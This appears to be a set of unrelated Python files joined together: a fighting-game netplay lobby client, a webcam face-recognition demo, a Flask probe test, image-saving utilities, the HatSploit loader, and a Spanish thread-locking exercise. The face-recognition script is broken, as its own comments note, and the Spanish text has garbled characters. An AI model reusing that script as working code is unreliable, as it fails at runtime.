        self.watch_player = i
        for k, v in self.widget_index.items():  # clear any previous FOLLOWING mark first
            try:
                if v.parent == self.player_list and k != self.player_id:
                    v.ids['WatchBtn'].text = 'FOLLOW'
            except KeyError:
                # header rows have no WatchBtn
                pass
        w.text = 'FOLLOWING'
    else:
        self.watch_player = None
        w.text = 'FOLLOW'
def auto_refresh(self):
    """Poll the lobby server every ~2s and redraw via create(); exits the
    lobby after repeated connection failures or a non-OK server reply."""
    net = requests.Session()
    while True:
        if self.lobby_thread_flag != 0:
            # exit() sets the flag to stop this thread
            break
        p = {
            'action': 'status',
            'id': self.code,
            'p': self.player_id,
            'secret': self.secret
        }
        try:
            req = net.get(url=LOBBYURL, params=p, timeout=5)
            req.raise_for_status()
        except (requests.exceptions.ConnectionError, requests.exceptions.Timeout) as e:
            logging.warning('LOBBY REFRESH: %s' % e.__class__)
            if self.get_attempts < 2:
                # tolerate up to two consecutive failures
                self.get_attempts += 1
                logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
            else:
                logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
                self.exit(msg='Error: %s' % e.__class__)
                break
        else:
            r = req.json()
            if r['msg'] == 'OK':
                self.create(r)
                time.sleep(2)
            else:
                # server rejected us (e.g. kicked / lobby closed)
                self.exit(msg=r['msg'])
                break
def exit(self, msg=None):
    """Leave the lobby: stop the refresh thread, notify the server
    (best effort), reset all per-lobby state, and optionally show *msg*."""
    self.lobby_thread_flag = 1  # signals auto_refresh to stop
    try:
        p = {
            'action': 'leave',
            'id': self.code,
            'p': self.player_id,
            'secret': self.secret
        }
        requests.get(url=LOBBYURL, params=p)
    except:
        # best effort - leaving must succeed locally even if the server is unreachable
        pass
    self.secret = None
    self.watch_player = None
    self.player_id = None
    self.code = None
    self.alias = None
    self.challenge_id = None
    self.challenge_name = None
    self.type = None
    self.lobby_updater = None
    self.get_attempts = 0
    self.app.remove_lobby_button()
    self.app.LobbyList.refresh()
    if msg:
        popup = GameModal()
        popup.modal_txt.text = msg
        popup.close_btn.text = 'Close'
        popup.close_btn.bind(on_release=popup.dismiss)
        popup.open()
    # Set Rich Presence to main menu again
    if self.app.discord is True:
        presence.menu()
        self.app.game.update_stats(once=True)
def send_challenge(self, obj, name, id, *args):
    """Challenge idle player *name*/*id*: open a waiting popup and start
    hosting a Versus game in a background thread."""
    self.watch_player = None  # challenging cancels any follow selection
    for k, v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # header rows have no WatchBtn
            pass
    self.challenge_name = name
    self.challenge_id = id
    popup = GameModal()
    popup.modal_txt.text = 'Challenging %s' % self.challenge_name
    popup.close_btn.text = 'Stop Playing'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    self.active_pop = popup
    popup.open()
    # host the game off the UI thread; set_ip() reports our IP to the server
    caster = threading.Thread(
        target=self.app.game.host, args=[self, app_config['settings']['netplay_port'], "Versus", id], daemon=True)
    caster.start()
def set_ip(self, ip=None):
    """Report our host *ip* to the lobby server for the pending challenge."""
    pyperclip.copy('')  # erase the IP address from the clipboard
    payload = {
        't': self.challenge_id,
        'p': self.player_id,
        'action': 'challenge',
        'id': self.code,
        'ip': ip,
        'secret': self.secret
    }
    print(payload)
    reply = requests.get(url=LOBBYURL, params=payload).json()
    print(reply)
def accept_challenge(self, obj, name, id, ip, *args):
    """Accept *name*'s challenge: join their game at *ip* in a background
    thread, notify the server, and show a connecting popup."""
    self.watch_player = None  # accepting cancels any follow selection
    for k, v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # header rows have no WatchBtn
            pass
    caster = threading.Thread(target=self.app.game.join, args=[
        ip, self, id], daemon=True)
    caster.start()
    # tell the server we are about to accept so it can update lobby state
    threading.Thread(target=self.send_pre_accept, args=[self.player_id, id]).start()
    popup = GameModal()
    popup.modal_txt.text = 'Connecting to %s' % name
    popup.close_btn.text = 'Stop Playing'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    self.active_pop = popup
    popup.open()
def send_pre_accept(self, id, target):
    """Tell the lobby server that player *id* is accepting *target*'s challenge."""
    payload = {
        't': target,
        'p': id,
        'action': 'pre_accept',
        'id': self.code,
        'secret': self.secret
    }
    print(payload)
    reply = requests.get(url=LOBBYURL, params=payload).json()
    print(reply)
def confirm(self, obj, r, d, p, n, t=None, *args):
    """Apply the chosen rollback (*r*) / delay (*d*) inputs and start the match.

    p: the frame-settings modal to close; n: opponent name;
    t: opponent id when we are the accepting side (triggers the MBAA check).
    """
    try:
        self.app.game.confirm_frames(int(r.text), int(d.text))
        self.opponent = n
        self.active_pop.modal_txt.text += "\nConnected to: %s, %s Delay & %s Rollback" % (
            n, d.text, r.text)
        self.active_pop = fill_wiki_button(self, self.active_pop)
        p.dismiss()
        if t != None:  # if accepting, run MBAA check
            threading.Thread(target=self.wait_for_MBAA, args=[t]).start()
    except ValueError:
        # non-numeric frame input - ignore and keep the modal open
        pass
def wait_for_MBAA(self, t):
    """Wait until MBAA reaches character select, then send 'accept' for
    opponent *t* to the lobby server.

    NOTE(review): this loop spins without sleeping while waiting
    (`continue` re-checks immediately) - left as-is to preserve behavior.
    """
    while True:
        if self.app.game.playing is True and self.active_pop != None:
            if self.app.game.read_memory(0x54EEE8) == 20:  # wait for char select
                resp = {
                    't': t,
                    'p': self.player_id,
                    'action': 'accept',
                    'id': self.code,
                    'secret': self.secret
                }
                print(resp)
                c = requests.get(url=LOBBYURL, params=resp).json()
                print(c)
                break
            else:
                continue
        else:
            # game closed or popup dismissed - stop waiting
            break
def watch_match(self, obj=None, name="", ip="", *args):
    """Spectate the running match hosted at *ip*; clears any follow marks."""
    self.watch_player = None
    for k, v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # header rows have no WatchBtn
            pass
    popup = GameModal()
    caster = threading.Thread(
        target=self.app.game.watch, args=[ip, self], daemon=True)
    self.active_pop = popup
    popup.modal_txt.text = 'Watching %s' % name
    popup.close_btn.text = 'Stop watching'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    popup = fill_wiki_button(self, popup)
    popup.open()
    self.app.offline_mode = 'Spectating'  # needs to be an offline mode for lobby multitasking
    caster.start()
def set_frames(self, name, delay, ping, target=None, mode="Versus", rounds=2):
    """Show the frame-settings modal pre-filled with suggested delay/rollback.

    target: opponent id when we are the accepting side (passed through to
    confirm() so the MBAA check runs after the settings are applied).
    """
    popup = FrameModal()
    if rounds != 0:
        rounds = ", %s rounds per game" % rounds
    else:
        rounds = ''
    popup.frame_txt.text = '[b]Connected to %s[/b]\n[size=14][u]%s mode%s[/u]\nNetwork delay: %s (%s ms)\nSuggested: Delay %s, Rollback %s[/size]' % (
        name, mode, rounds, delay, ping, self.app.game.ds, self.app.game.rs)
    # prefill the inputs with the game's suggested values
    popup.r_input.text = str(self.app.game.rs)
    popup.d_input.text = str(self.app.game.ds)
    popup.start_btn.bind(on_release=partial(
        self.confirm, p=popup, r=popup.r_input, d=popup.d_input, n=name, t=target))
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    popup.open()
def error_message(self, e):
    """Show the caster error lines *e* in a popup, replacing any active popup."""
    self.error = True
    popup = GameModal()
    popup.modal_txt.text += ''.join(line + '\n' for line in e)
    popup.close_btn.text = "Close"
    popup.close_btn.bind(on_release=partial(self.dismiss_error, p=popup))
    if self.active_pop != None:
        self.active_pop.dismiss()
        self.active_pop = None
    popup.open()
def dismiss_error(self, obj, p):
    """Close the error popup *p* and clear the error flag."""
    p.dismiss()
    self.error = False
# TODO prevent players from dismissing caster until MBAA is open to avoid locking issues
def dismiss(self, obj, p, *args):
    """Stop the current match/connection: kill the caster, tell the server the
    match ended, and close popup *p* plus any active popup."""
    self.app.game.kill_caster()
    self.challenge_name = None
    self.opponent = None
    self.challenge_id = None
    r = {
        'action': 'end',
        'p': self.player_id,
        'id': self.code,
        'secret': self.secret
    }
    requests.get(url=LOBBYURL, params=r)
    p.dismiss()
    if self.active_pop != None:
        self.active_pop.dismiss()
        self.active_pop = None
def invite_link(self, *args):
    """Copy an invite URL to the clipboard (alias if set, else the raw code)
    and flash a confirmation in the lobby-code label."""
    slug = self.alias if self.alias else self.code
    pyperclip.copy('https://invite.meltyblood.club/%s' % slug)
    threading.Thread(target=self.invite_ui).start()
def invite_ui(self):
    """Flash 'Link copied to clipboard' in the lobby-code label for 2 seconds
    (runs on a worker thread so the sleep doesn't block the UI)."""
    if self.lobby_code.text != 'Link copied to clipboard':
        t = self.lobby_code.text
        self.lobby_code.text = 'Link copied to clipboard'
        time.sleep(2)
        self.lobby_code.text = t
|
reconhecimento.py | # -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing import Pipe,Process
import multiprocessing.dummy as mp
import face_recognition
import cv2
import time
# Demo of running face recognition on live video from the webcam, with two
# basic performance tweaks: frames are processed at 1/4 resolution (but shown
# at full resolution) and only every other frame is analysed.
# OpenCV (`cv2`) is required only to read from the webcam; it is *not* needed
# by the face_recognition library itself.

# Handle to webcam #0 (default)
video_capture = cv2.VideoCapture(0)

# Load a reference picture and learn how to recognise it.
leleo_image = face_recognition.load_image_file("leleo.jpg")
leleo_face_encoding = face_recognition.face_encodings(leleo_image)[0]

# Load a second picture and learn how to recognise it.
bastos_image = face_recognition.load_image_file("bastos.jpg")
bastos_face_encoding = face_recognition.face_encodings(bastos_image)[0]

# Known face encodings and their display names.
# NOTE(review): `global` at module level is a no-op; these two statements have no effect.
global face_names
global known_face_encodings
known_face_encodings = [
    leleo_face_encoding,
    bastos_face_encoding
]
known_face_names = [
    "Leleo",
    "Gabriel Bastos"
]

# Shared state used by the helper functions below.
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True  # process only every other frame
tempo_anterior = 0  # timing leftovers; not used below
tempo = 0
#################
# Worker function used with multiprocessing.dummy (thread pool)
def face_match(face_encoding):
    """Compare one detected encoding against the known faces and append the
    matched name (or "Desconhecido"/unknown) to the global face_names list."""
    # Check whether the detected face is among the known ones
    matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
    name = "Desconhecido"
    # If the detected face matches a known one, use the first match.
    if True in matches:
        first_match_index = matches.index(True)
        name = known_face_names[first_match_index]
    face_names.append(name)
# Function that captures a frame from the webcam
def capture_and_resize(ret, frame, rgb_small_frame):
    """Grab one frame, shrink it to 1/4 size and convert BGR -> RGB.

    NOTE(review): the parameters are rebound locally, so the results never
    reach the caller; and since this is run in a separate Process (see the
    main loop), module globals are not shared either. As written the output
    appears to be discarded - confirm intent before relying on it.
    """
    ret, frame = video_capture.read()  # capture a single video frame
    small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)  # 1/4 resolution for faster recognition
    rgb_small_frame = small_frame[:, :, ::-1]  # BGR (OpenCV) -> RGB (face_recognition)
def processar_video(face_names, face_locations):
    """Detect faces in the current small frame and match them in a thread pool.

    NOTE(review): the parameters are rebound locally so results never reach
    the caller, and `rgb_small_frame` must exist as a module-level value for
    this to run - verify against the call site in the main loop.
    """
    face_locations = face_recognition.face_locations(rgb_small_frame)
    face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
    face_names = []
    if __name__ == '__main__':
        # thread pool (multiprocessing.dummy), so face_match can append to face_names
        pool = mp.Pool(2)
        pool.map(face_match, face_encodings)
        pool.close()
        pool.join()
#################
while True:
    antes = time.time()  # per-iteration timing start
    processos = []
    # Capture a frame in a child process.
    # NOTE(review): Pipe() returns two Connection objects; passing the child
    # ends as plain args does not transfer any data back, so this wiring looks
    # broken - confirm intended data flow before refactoring.
    parent_frame, frame = Pipe()
    parent_ret, ret = Pipe()
    parent_rgb_small_frame, rgb_small_frame = Pipe()
    p1 = multiprocessing.Process(target=capture_and_resize, args=(ret, frame, rgb_small_frame))
    processos.append(p1)
    p1.start()
    # Only process every other frame of video to save time
    print(parent_frame)
    p1.join()
    if process_this_frame:
        print("processando")
        parent_face_names, face_names = Pipe()
        parent_face_locations, face_locations = Pipe()
        p2 = multiprocessing.Process(target=processar_video, args=(face_names, face_locations))
        processos.append(p2)
        p2.start()
    process_this_frame = not process_this_frame
    # Display the results
    # NOTE(review): zip() over Connection objects raises TypeError; presumably
    # the intent was to recv() the locations/names lists from the child - confirm.
    for (top, right, bottom, left), name in zip(parent_face_locations, parent_face_names):
        # Undo the 1/4 scaling applied during detection
        top *= 4
        right *= 4
        bottom *= 4
        left *= 4
        if (name == "Desconhecido"):
            # Draw a red box around unknown faces
            cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
            # Write the name below the box
            cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
            font = cv2.FONT_HERSHEY_DUPLEX
            cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
        else:
            # Draw a green box around recognised faces
            cv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)
            # Write the name below the box
            cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)
            font = cv2.FONT_HERSHEY_DUPLEX
            cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
    # Show the resulting image
    cv2.imshow('Video', frame)
    agora = time.time()
    diferenca = (agora - antes)
    print(diferenca)
    # Press 'q' to quit!
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
# Wait for child processes, then close the webcam connection
for processo in processos:
    processo.join()
agora = time.time()
diferenca = (agora - antes)
print(diferenca)
video_capture.release()
cv2.destroyAllWindows()
|
test.py | import sys
import time
from multiprocessing import Process
from pprint import pprint
import http.client
import psycopg2
import toml
from flask import Flask
# Flask app exposing the test endpoints probed by the integration test below.
app = Flask(__name__)

# Threshold (seconds) above which a probed response counts as "slow".
SLOW_DELAY = 1.0
@app.route('/hello')
def route_hello():
return 'hello'
@app.route('/fast')
def route_fast():
return 'fast'
@app.route('/slow')
def route_slow():
    """Probe target that responds just at the slow threshold (SLOW_DELAY)."""
    time.sleep(SLOW_DELAY)
    return 'slow'
@app.route('/never')
def route_never():
    """Probe target that stalls 5x the slow threshold so the probe
    records a timeout (code 0)."""
    time.sleep(SLOW_DELAY * 5)
    return 'never'
# TODO DRY, Share db and config code with main ...
def load_lines(file_name):
    """Read *file_name* and return its lines, newline characters included."""
    with open(file_name) as handle:
        return list(handle)
def with_db_connection(db_config, proc):
    # Open a PostgreSQL connection from the configured URI, with the password
    # read from a separate secrets file (first line, stripped), then run the
    # caller's callback with an open cursor and return its result.
    # NOTE(review): psycopg2's `with conn` commits/rolls back the transaction
    # but does NOT close the connection; fine for this short-lived test
    # process -- confirm before reusing this helper in a long-running service.
    with psycopg2.connect(db_config['uri'],
                          password=load_lines(db_config['password_file'])[0].strip()) as conn:
        with conn.cursor() as cur:
            return proc(cur)
def normalize_status(row):
    """Return (url, http_status, slow?, content_match?)"""
    # Row layout (from the web_status query): url, code, duration, match.
    if row[1] == 0:
        # No HTTP response at all: treated as "slow" and there can be no
        # content match either.
        assert not row[3]
        return row[0], 0, True, False
    return row[0], row[1], row[2] >= SLOW_DELAY, row[3]
def test_proc(db_config, delay):
    """End-to-end check: wait for the prober to run, then verify the
    expected status rows appeared in the database after our start time.

    Returns True when every expected (url, code, slow?, match?) tuple is
    present among the normalized rows.
    """
    print("Awaiting probes.")
    # Record the start timestamp (UTC) so only rows produced from now on count.
    start_at = time.strftime('%Y-%m-%d %H:%M:%SZ', time.gmtime(time.time()))
    time.sleep(delay * 3 + 10)  # 2 cycles + some time for in-flight messages to settle
    def check_statuses(cur):
        # Runs with an open DB cursor (see with_db_connection below).
        print(f"Checking db results after {start_at}.")
        cur.execute("SELECT url, code, duration, match FROM web_status where timestamp >= %s",
                    (start_at,))
        rows = [row for row in cur]
        print(f"Received {len(rows)} records.")
        results = set([normalize_status(r) for r in rows])
        print("Normalized results:")
        pprint(results)
        expecting = {('http://10.0.0.5:12321/fast', 0, True, False), # No connection
                     ('http://10.0.0.5:8080/fast', 200, False, True), # OK
                     ('http://10.0.0.5:8080/hello', 200, False, False), # Content mismatch
                     ('http://10.0.0.5:8080/never', 0, True, False), # Timeout
                     ('http://10.0.0.5:8080/newverland', 404, False, False), # 404
                     ('http://10.0.0.5:8080/slow', 200, True, True) # Slow
                     }
        print("Expecting:")
        pprint(expecting)
        # It could be possible to compare with '==' to potentially detect more problems.
        # But flask is not available immediately, which is already recorded by probe.
        # Also there may be other probes running.
        # A reliable implementation of '==' comparison would be more complex.
        return len(expecting.difference(results)) == 0
    return with_db_connection(db_config, check_statuses)
if __name__ == '__main__':
    # Spin up the probe-target Flask app in a child process, run the
    # end-to-end database check, and always tear the app down afterwards.
    config = toml.load('config/config.toml')
    flask = Process(target=lambda: app.run(host='10.0.0.5', port=8080))
    try:
        flask.start()
        if test_proc(config['db'], config['web']['delay_s']):
            print("\nTest passed.\n")
        else:
            print("\nTest failed.\n")
            sys.exit(1)
    finally:
        # terminate() rather than join(): the Flask server never exits on its own.
        flask.terminate()
|
__init__.py | import importlib
import os
from os import path
import sys
import time
import math
import collections
import multiprocessing
import imageio
import pickle
import itertools
import torch
import torchvision.utils as vutils
def str2num(string):
    '''
    Extract the integer formed by concatenating all digit characters
    in the given string.

    Arg:
        string (str): text containing at least one digit

    Raises:
        ValueError: if the string contains no digits at all.
    '''
    return int(''.join(filter(str.isdigit, string)))
def format_vp(n):
    """Format a number compactly: '0' for zero, scientific notation for
    magnitudes below 1e-4, otherwise fixed point with 0-4 decimals that
    shrink as the integer part grows."""
    if n == 0:
        return '0'
    magnitude = abs(n)
    if magnitude < 1e-4:
        # Too small for fixed point: one significant figure, scientific.
        return '{:.1g}'.format(n)
    # Number of integer digits above one, capped at 4.
    int_digits = int(min(4, max(0, math.log10(magnitude))))
    return '{:.{}f}'.format(n, 4 - int_digits)
def save_with_exception(obj, name):
    """Save *obj* to *name* via torch.save, creating parent directories.

    Failures are reported on stdout rather than raised, so a bad
    checkpoint path never aborts the caller.
    """
    try:
        parent = path.dirname(name)
        if parent:
            os.makedirs(parent, exist_ok=True)
        torch.save(obj, name)
    except IOError as io_error:
        print('Fail to save {}!'.format(name))
        print(io_error)
    except Exception as e:
        print(e)
def to(obj, gpus='auto', precision='single'):
    '''
    A simple and convenient wrapper around torch .to().

    Args:
        obj: any object with a .to() method (Tensor / Module)
        gpus: 'auto' picks one GPU when CUDA is available, else CPU;
              any integer > 0 forces CUDA, 0 forces CPU
        precision: 'half' casts to float16; anything else keeps the dtype
    '''
    if gpus == 'auto':
        gpus = 1 if torch.cuda.is_available() else 0
    device = torch.device('cuda' if gpus > 0 else 'cpu')
    dtype = torch.half if precision == 'half' else None
    return obj.to(device=device, dtype=dtype)
class SRMisc(object):
    '''
    Miscellaneous things for super-resolution

    Provides quantization helpers and a pool of background worker
    processes that save result images without blocking the main loop.
    '''
    def __init__(self, cfg=None):
        # Queue feeding the background save workers; created lazily by
        # begin_background() (or on first save()).
        self.queue = None
        if cfg is not None:
            self.print_every = cfg.print_every
        else:
            self.print_every = 100
    def is_print(self, batch):
        '''Return True when the (0-based) batch index should be logged.'''
        return (batch + 1) % self.print_every == 0
    def quantize(self, *xs):
        '''
        Quantize -1 ~ 1 to 0 ~ 255.
        Args:
            *xs: one or more tensors with values in [-1, 1]
        Return:
            a single quantized tensor if one input is given, else a list
        '''
        rgb = 255
        _quantize = lambda x: x.add(1).mul(rgb / 2).round().clamp(0, rgb)
        if len(xs) == 1:
            return _quantize(xs[0])
        else:
            return [_quantize(x) for x in xs]
    def begin_background(self):
        '''Spawn one background save-worker process per CPU core.'''
        self.queue = multiprocessing.Queue()
        def target(queue):
            # Worker loop. Queue.get() blocks until an item is available,
            # so no empty()/continue busy-wait is needed (the original spin
            # loop burned a full core per worker). A (None, None) item is
            # the shutdown sentinel.
            while True:
                name, x = queue.get()
                if name is None:
                    return
                try:
                    if '.pt' in name:
                        with open(name, 'wb') as f:
                            pickle.dump(x, f)
                    elif '.jp' in name or '.JP' in name:
                        # JPEG: request maximum quality.
                        imageio.imwrite(name, x, quality=100)
                    else:
                        imageio.imwrite(name, x)
                except IOError as io_error:
                    print('Cannot save image file!')
                    print(io_error)
                except Exception as e:
                    print(e)
                    sys.exit(1)
        def worker():
            return multiprocessing.Process(target=target, args=(self.queue,))
        self.process = [worker() for _ in range(multiprocessing.cpu_count())]
        for p in self.process:
            p.start()
    def end_background(self):
        '''Send the shutdown sentinel to every worker (does not wait).'''
        if self.queue is None:
            return
        for _ in self.process:
            self.queue.put((None, None))
    def join_background(self):
        '''Block until the queue is drained and all workers have exited.'''
        if self.queue is None:
            return
        # Coarse 0.5s polling is acceptable here: this only runs at shutdown.
        while not self.queue.empty():
            time.sleep(0.5)
        for p in self.process:
            p.join()
        self.queue = None
    @staticmethod
    def tensor2np(x):
        '''Convert a CHW tensor to an HWC uint8 numpy array.'''
        x = x.permute(1, 2, 0)
        x = x.byte().cpu().numpy()
        return x
    def save(self, x, save_as, name, exts='.png', single=False):
        '''
        Save output result as images
        Args:
            x (dict or Tensor): an image, or images with their keys
            save_as (str): name of the subdirectory
            name (str): name of the file
            exts (str or sequence): file extension(s) to save under
            single (bool): shut the worker pool down after this save
        '''
        if not isinstance(exts, (list, tuple)):
            exts = (exts,)
        y = {}
        for ext in exts:
            if isinstance(x, dict):
                for k, v in x.items():
                    y['{}_{}{}'.format(name, k, ext)] = v
            else:
                y['{}{}'.format(name, ext)] = x
        os.makedirs(save_as, exist_ok=True)
        if self.queue is None:
            # Lazily start the worker pool on first use.
            try:
                self.begin_background()
            except Exception as e:
                print('Cannot start threads!')
                print(e)
                return
        for k, v in y.items():
            name = path.join(save_as, k)
            v = self.quantize(v)
            if v.size(0) > 1:
                # Batched images: save a tiled grid synchronously.
                vutils.save_image(v / 255, name, nrow=16, padding=0)
            else:
                v = SRMisc.tensor2np(v[0])
                self.queue.put((name, v))
        if single:
            self.end_background()
            self.join_background()
|
loader.py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import sys
import time
import threading
import os
import string
import requests
from core.cli.badges import badges
from core.db.importer import importer
from core.base.config import config
class loader:
    '''Bootstraps HatSploit: checks for updates and imports all framework
    components, animating a spinner while loading runs in the background.'''
    def __init__(self):
        self.badges = badges()
        self.importer = importer()
        self.config = config()
    def load_update_process(self):
        '''Fetch the remote core config and warn when the local framework
        version differs from the published one.'''
        remote_config = requests.get('https://raw.githubusercontent.com/EntySec/HatSploit/main/config/core_config.yml', stream=True)
        remote_config = remote_config.content
        if self.config.get_config_file(remote_config)['details']['version'] != self.config.core_config['details']['version']:
            self.badges.output_warning("Your HatSploit Framework is out-dated.")
            self.badges.output_information("Consider running ./update.sh")
        time.sleep(1)
    def load_components(self):
        '''Import every framework component/module.'''
        self.importer.import_all()
    def load_everything(self):
        self.load_update_process()
        self.load_components()
    def load_all(self):
        '''Run load_everything() on a worker thread while animating a
        spinner with a case-toggling "wave" effect over the status line.'''
        loading_process = threading.Thread(target=self.load_everything)
        loading_process.start()
        base_line = "Loading the HatSploit Framework..."
        cycle = 0
        while loading_process.is_alive():
            # FIX: the backslash is now escaped; the original "/-\|" relied
            # on the invalid escape sequence "\|" (SyntaxWarning on modern
            # Python). "\\|" produces the same characters.
            for char in "/-\\|":
                status = base_line + char + "\r"
                cycle += 1
                # Toggle the case of one rotating character for a wave effect.
                if status[cycle % len(status)] in list(string.ascii_lowercase):
                    status = status[:cycle % len(status)] + status[cycle % len(status)].upper() + status[cycle % len(status) + 1:]
                elif status[cycle % len(status)] in list(string.ascii_uppercase):
                    status = status[:cycle % len(status)] + status[cycle % len(status)].lower() + status[cycle % len(status) + 1:]
                sys.stdout.write(self.badges.P + status)
                time.sleep(.1)
                sys.stdout.flush()
        loading_process.join()
|
Proyecto2sistop.py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 11 02:52:43 2020
@name: El plato de comida para perros
@author: Fernando Arturo Medina Molina
@contact: fernando170@comunidad.unam.mx
@version: 1.0
@description:
A travรฉs de รฉste cรณdigo se pretende dar soluciรณn al problema de
sincronizaciรณn de hilos planteado en el archivo README.md dentro de este
repositorio, las variables se explicaran en el apartado @variables, para
resolver la problemรกtica planteada he decidido utilizar el mรกs comรบn de las
implementaciรณnes que es la de hacer un mutex con la finalidad de que el
alimento pueda restarsele la cantidad de alimento que el perro desee en
cada ocasiรณn.
@variables:
cantidadDeCroquetas: Serรก la cantidad en gramos de comida que se le da a
los perros. :int:
perroG: Serรก la representaciรณn del perro mรกs grande como un hilo y podrรก
comer hasta 300 gramos por ocasiรณn.
perroM: Serรก la representaciรณn del perro mediano de igual manera con un
hilo, este podrรก consumir hasta 100 gramos.
perroC: Serรก la representaciรณn del perro pequeรฑo igualmente con un hilo, el
cual puede consumir hasta 50 gramos de alimento por ocasiรณn.
plato: Serรก el recurso que se compartirรก por los perros, en el estรก
contenido la cantidad de alimento servida en esa ocasiรณn.
tDeCons: Tiempo que tardarรก el perro en consumir su alimento. :int:
"""
import threading
import time
cantidadDeCroquetas=450
def consumo(cantidad,tDeCons,perro):
    """
    Once a dog has reached and holds the bowl, it eats the amount
    appropriate to its size.

    :param cantidad: grams of food the dog eats this time :int
    :param tDeCons: seconds the dog spends eating :int
    :param perro: label of the dog, used for logging :str
    """
    global cantidadDeCroquetas
    print('El perro '+perro+' estรก comiendo')
    time.sleep(tDeCons)
    # Deduct this meal from the shared food counter (caller holds the lock).
    cantidadDeCroquetas -= cantidad
    print('Cantidad de croquedas actual: '+str(cantidadDeCroquetas)+' gramos\n\n\n')
    if cantidadDeCroquetas == 0:
        # Bowl is empty: bark so the humans notice.
        print('Ya no quedan croquetas!!! a ladrar para que nos hagan caso.')
def comer(plato,cantidad,tDeCons,perro):
    '''
    The first dog to reach the bowl gets to eat: it owns the bowl (the
    lock) for the whole duration of its meal.

    :param plato: the single shared bowl, a threading.Lock :protected resource
    :param cantidad: grams of food eaten this time, varies by size :int
    :param tDeCons: seconds spent eating :int
    :param perro: label of the dog :str
    '''
    # Holding the lock means owning the bowl; it is released automatically
    # when the meal (consumo) finishes, even on error.
    with plato:
        consumo(cantidad,tDeCons,perro)
print('Plato servido!!! A comer!')
print('Cantidad de croquetas actual: '+str(cantidadDeCroquetas)+' gramos\n\n\n')
plato=threading.Lock()#The bowl is the protected shared resource
perroG=threading.Thread(target=comer,args=(plato,300,5,'grande'))#big dog: 300 g in 5 s
perroM=threading.Thread(target=comer,args=(plato,100,3,'mediano'))#medium dog: 100 g in 3 s
perroC=threading.Thread(target=comer,args=(plato,50,2,'chico'))#small dog: 50 g in 2 s
perroG.start()
perroM.start()
perroC.start()
# Wait for all three dogs to finish eating before the program exits.
perroG.join()
perroM.join()
perroC.join()
exported-sql-viewer.py | #!/usr/bin/env python
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
